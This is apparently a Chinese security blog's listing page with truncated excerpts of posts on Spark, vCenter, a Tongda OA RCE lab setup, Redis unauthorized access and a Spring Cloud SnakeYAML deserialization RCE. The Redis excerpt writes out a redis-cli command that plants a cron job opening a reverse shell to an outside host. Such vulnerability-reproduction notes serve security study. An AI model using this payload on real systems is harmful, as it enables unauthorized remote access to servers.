Spark簡介 spark是一個實現快速通用的集群計算平台。它是由加州大學伯克利分校AMP實驗室 開發的通用內存並行計算框架，用來構建大型的、低延遲的數據分析應用程序。它擴展了廣泛使用的Map ...

Spark簡介 spark是一個實現快速通用的集群計算平台。它是由加州大學伯克利分校AMP實驗室 開發的通用內存並行計算框架，用來構建大型的、低延遲的數據分析應用程序。它擴展了廣泛使用的Ma ...

0x00 Vmware vcenter信息 vSphere是VMware推出的虛擬化平台套件，包含ESXi、vCenter Server等一系列的軟件。其中vCenter Server為 ESX ...

環境搭建： 通達OA下載：https://www.tongda2000.com/download/2019.php 由於此版本已經修復，需要下載兩個文件進行覆蓋。 漏洞文件下載：https://github.com/jas502n/OA-tongda-RCE 注意：版本 ...

　　未授權無需認證訪問內部數據庫。 利用計划任務反彈shell redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config ...

0x00 漏洞簡介： 漏洞出來第一時間，聽漏洞澮測的朋友傳來的情報，就及時給了POC，但一直沒復現，只是簡單看了文章，提到需要可以注冊用戶才能進行攻擊，然后就感覺挺雞肋，沒有再繼續看。 恰巧好基友濤子給我發來他復現的文章，看了看exp，感覺並沒那么雞肋，相反可以通過未授權進行權限的獲取 ...

一、漏洞成因： 　　spring cloud在低版本下的 SnakeYAML 依賴組件存在反序列漏洞（所以有的利用叫：springcloud-snakeyaml-rce） 二、利用條件　　 　　Spring boot版本范圍： 　　　　Spring Boot 2.X 　　 全部 ...

1. 來源 https://twitter.com/ptswarm/status/1338477426276511749 https://mp.weixin.qq.com/s/4ayfBOYJZS ...